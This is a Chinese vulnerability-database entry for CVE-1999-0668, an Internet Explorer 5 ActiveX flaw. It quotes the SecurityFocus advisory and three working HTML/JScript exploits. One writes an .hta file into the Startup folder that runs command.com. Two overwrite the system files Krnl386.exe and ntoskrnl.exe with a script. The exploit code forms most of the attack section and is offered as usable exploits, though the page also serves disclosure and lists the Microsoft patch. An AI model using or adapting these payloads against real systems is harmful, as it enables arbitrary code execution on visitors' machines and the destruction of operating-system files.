Microsoft IE5 ActiveX "Object for constructing type libraries for scriptlets"漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105519 漏洞类型 边界条件错误
发布时间 1999-08-21 更新时间 2007-07-16
CVE编号 CVE-1999-0668 CNNVD-ID CNNVD-199908-043
漏洞平台 Windows CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/19468
https://www.securityfocus.com/bid/598
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199908-043
|漏洞详情
InternetExplorer中标志为"safeforscripting"的scriptlet.typelibActiveX控件存在漏洞。远程攻击者可以执行任意命令,如Bubbleboy。
|漏洞EXP
Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 ActiveX "Object for constructing type libraries for scriptlets" Vulnerability

source: http://www.securityfocus.com/bid/598/info

The 'scriptlet.typlib' ActiveX control can create, edit, and overwrite files on the local disk. This means that an executable text file (e.g. a '.hta' file) can be written to the startup folder of a remote machine and will be executed the next time that machine reboots. Attackers can exploit this vulnerability via a malicious web page or an email message. 

Exploit by Georgi Guninski.
A working demo is available at:
http://www.nat.bg/~joro/scrtlb.html

<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski
http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>

Exploit by Seth Georgion
A working demo is available at: http://www.sassproductions.com/hacked.htm

Windows 98:
<p>
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
height="14"
></object><script>
scr.Reset();
scr.Path="C:\\windows\\system\\Krnl386.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
</p>

Windows NT:
<p>
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
width="14" height="14">
</object>
<script>
scr.Reset();
scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
</p>
|受影响的产品
Microsoft Internet Explorer 5.0 for Windows NT 4 + Microsoft Windows NT 4.0 + Microsoft Windows NT 4.0 Microsoft Internet Explorer 5.0 for
|参考资料

来源:MS
名称:MS99-032
链接:http://www.microsoft.com/technet/security/bulletin/ms99-032.asp
来源:BID
名称:598
链接:http://www.securityfocus.com/bid/598
来源:MSKB
名称:Q240308
链接:http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q240308
来源:CIAC
名称:J-064
链接:http://ciac.llnl.gov/ciac/bulletins/j-064.shtml